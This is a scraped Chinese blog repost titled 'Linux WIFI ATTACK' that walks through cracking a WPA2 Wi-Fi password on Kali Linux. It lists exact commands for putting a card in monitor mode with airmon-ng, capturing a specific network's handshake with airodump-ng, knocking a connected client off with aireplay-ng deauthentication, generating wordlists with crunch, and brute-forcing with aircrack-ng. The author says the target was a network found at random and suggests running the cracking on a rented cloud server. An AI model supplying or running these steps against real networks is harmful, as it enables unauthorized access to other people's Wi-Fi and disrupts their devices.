zoukankan      html  css  js  c++  java
  • Linux WIFI ATTACK

    {

    https://github.com/conwnet/wpa-dictionary
    http://www.360doc.com/content/18/0827/09/52701931_781512408.shtml
    https://www.cnblogs.com/a986771570/p/6210925.html

    }

    {

      //build password

      //abcdefghijklmnopqrstuvwxyz0123456789

      crunch 10 10 0123 -o ./password.txt

      sudo su

      airmon-ng start

      //wlan0mon or other

      //listen

      airodump-ng wlan0mon

      //open terminal

      //ch  + mac

      sudo su

      airodump-ng -c  ch  --bssid mac wlan0mon

      

      aireplay-ng -0 2 -a mac -c mac wlan0mon

      

      aircrack-ng -w password.txt *.cap

    }

    {

    操作环境:kali

    使用工具:aircrack-ng,crunch

        在家里闲来无事,便研究了一下怎么破解wifi密码,也算有点成就感.本文章争取通俗笼统,尽量保证让新手也能看懂,当然完全没Linux基础还是先去坐着吧。

    不要对其中的命令死记硬背,先要把原理和步骤搞清楚

    开始:


     

    1.打开WIFI,但是要断开wifi连接,防止后面出现错误

    2.airmon-ng  查看支持监控(moniter)的网卡,我的是wlan0,每个人可能会不同,按你的实际名称来(图1)

    图1

    3.airmon-ng start wlan0  开启该网卡监控模式(moniter),网卡名称变为wlan0mon,之后写网卡名称时不要错写成wlan0!我用airmon-ng命令重新确认了一下(图2)

    图2

    4.airodump-ng wlan0mon  使用该网卡开始扫描,显示一大批wifi热点,都是WPA2 加密模式,差不多选择完目标后可选择Ctrl+c停止扫描(图3)

    图3

    5.airodump --bssid   该wifi的bssid   --channel  该wifi的信道   --write  把捕获的包放到哪里    wlan0mon  (图4)

    例如我选择第一个xiaomi则输入

    airodump --bssid 34:80:B3:3C:FD:49  --channel  6  --write  xiaomi  wlan0mon    (建议先创建一个目录,在该目录下运行此命令)

    图4

    6.发现连接该wifi的有一台设备,我们需要获取该wifi的用户认证包,你可以一直等他下次重新上线,当然我们没那么有耐心,于是就有了下一个命令aireplay-ng(图4)

    7.aireplay-ng -0 3 -a  该wifi的bssid   -c 连接该wifi的用户设备station  wlan0mon  (图5右侧)

    (-0表示发送解除认证,让该设备重新连接以获取认证包,3表示发送3次,当该数为0时表示无限次,-a表示access point,-c表示client)

    图5

    运行该命令后图5左边窗口出现 【WPA handshake:......】说明抓到了认证包,可以与图4对比一下。完成之后记得用 airmon-ng stop wlan0mon 关闭网卡监听模式!

    8.此步骤为额外步骤,可不进行。

    我用wireshark打开捕获的包xiao.cap,点Protoco进行分类,确实发现了认证包

    图6

    9.有了认证包之后,我们破解还需要字典,一般人密码会用八位数字组成,于是我用crunch创建8位纯数字组成的字典,有837MB大小,对crunch工具不了解的自行百度

    crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o wordlist.txt

    调用密码库文件 charset.lst, 生成最小为8,最大为8,元素为密码库 charset.lst中 numeric的项目,并保存为 wordlist.txt;其中 charset.lst在kali_linux的目录 为 /usr/share/crunch/charset.lst, -o:用于指定输出字典文件的位置。

    >想了解更多可以vim  /usr/share/crunch/charset.lst 查看所有密码库

    图7

    10.aircrack-ng    捕获的.cap包   -w 密码字典

    图8

    11.额外步骤,可不进行。

    因为是自己随便找的wifi,所以用暴力破解看运气,很耗时间,所以我干脆把他放到租的云服务器里让他自个去运行,反正现在云服务器很便宜,用上screen命令让其在用户退出登陆时继续运行(不了解screen工具的自行百度,一个很好用的工具)



    作者:颜科鸣_5482
    链接:https://www.jianshu.com/p/893cc1224d34
    来源:简书
    著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

    }

  • 相关阅读:
    MySQL-基本sql命令
    Java for LeetCode 203 Remove Linked List Elements
    Java for LeetCode 202 Happy Number
    Java for LeetCode 201 Bitwise AND of Numbers Range
    Java for LeetCode 200 Number of Islands
    Java for LeetCode 199 Binary Tree Right Side View
    Java for LeetCode 198 House Robber
    Java for LeetCode 191 Number of 1 Bits
    Java for LeetCode 190 Reverse Bits
    Java for LeetCode 189 Rotate Array
  • 原文地址:https://www.cnblogs.com/YZFHKMS-X/p/12927308.html
Copyright © 2011-2022 走看看